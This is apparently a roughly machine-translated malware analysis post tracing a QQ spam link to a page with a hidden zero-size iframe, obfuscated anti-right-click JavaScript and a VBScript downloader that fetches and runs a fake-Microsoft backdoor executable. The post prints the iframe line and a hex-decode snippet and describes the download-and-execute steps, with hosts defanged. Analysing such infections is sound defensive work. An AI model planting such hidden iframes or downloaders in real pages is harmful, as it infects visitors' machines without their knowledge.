Spread backdoor. win32.agent. ahj

EndurerOriginal
1Version

Qq receives the following information:
/---
I just found a free online movie station with a large number of passionate N-level films. The viewing speed is quite fast! Hxxp: // P2P. m *** M1 *** 6 *** 8 ***. Info
---/

Hxxp: // P2P. m *** M1 *** 6 ** 8 ***. info/Home PageCode included:

/---
<IFRAME src = "hxxp: // SMS. E *** es *** Ms ** s.com/m?#}.html "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // SMS. e *** es *** Ms *** s.com/m?##.htmlContains Javascript script code encrypted with crypthtml XP (unregistered version.

The decrypted content contains a piece of Javascript script code and a piece of VBScript code.

The Javascript script code is as follows:
/---
Wc96 = 2956; If (document. all) {function _ DM () {return false}; function _ MDM () {document. oncontextmenu = _ DM; setTimeout ("_ MDM ()", 800)}; _ MDM ();} document. oncontextmenu = new function ("Return false"); function _ NDM (e) {If (document. layers | window. sidebar) {If (E. which! = 1) return false ;}}; if (document. layers) {document. captureevents (event. mousedown); document. onmousedown = _ NDM;} else {document. onmouseup = _ NDM;}; vp56 = 4099; Cx26 = 958; function _ DDS () {If (document. all) {document. onselectstart = function () {return false}; setTimeout ("_ DDS ()", 700) };_ DDS (); ak86 = 2101; co98 = 7242; ty3 = 100; er10 = 2383; ex7 = 8673; _ licensed_to _ = "";
---/
The main function is to define some variables and assign values while disabling right-clicking.

The value of uurlin the vbscriptscript code exposes that the URL of the malicious file to be downloaded is I .exe on another website.
However, the specific download and running methods are saved in variable S.

The value of variable S is determined by the Code
/---
D = ""
Do While Len (s)> 1
K = "& H" + Left (S, 2)
P = clng (k)
M = CHR (P)
D = D & M
S = mid (s, 3)
Loop
---/
.

The decrypted s value is a piece of VBScript code. The function is to use Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the I .exe file and saves it as % Temp %/pe.exe. The created content is: shell. shellExecute "+ % Temp %/pe.exe +", "" open "", 0 "file pe.vbs, and run pe.exe with q.shellexecute.

Use the ShellExecute method of the Shell. Application Object Q to run the program.

File description:D:/test/I .exe
Attribute: ---
Language: English (USA)
File version: 5.2.20.0.1830
Note: asn.2 runtime APIs
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 5.2.20.0.1830
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:46:57
Modification time: 22:46:58
Access time:
Size: 19498 bytes, 19.42 KB
MD5: 4d6df04ad8aaaa7537a9253b563b2d35

Impersonate Microsoft files ......

Scanned file: I .exe-infected

I .exe-infected by backdoor. win32.agent. ahj Statistics: Known viruses: 280806 Updated: 12-03-2007 File size (Kb ): 20 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0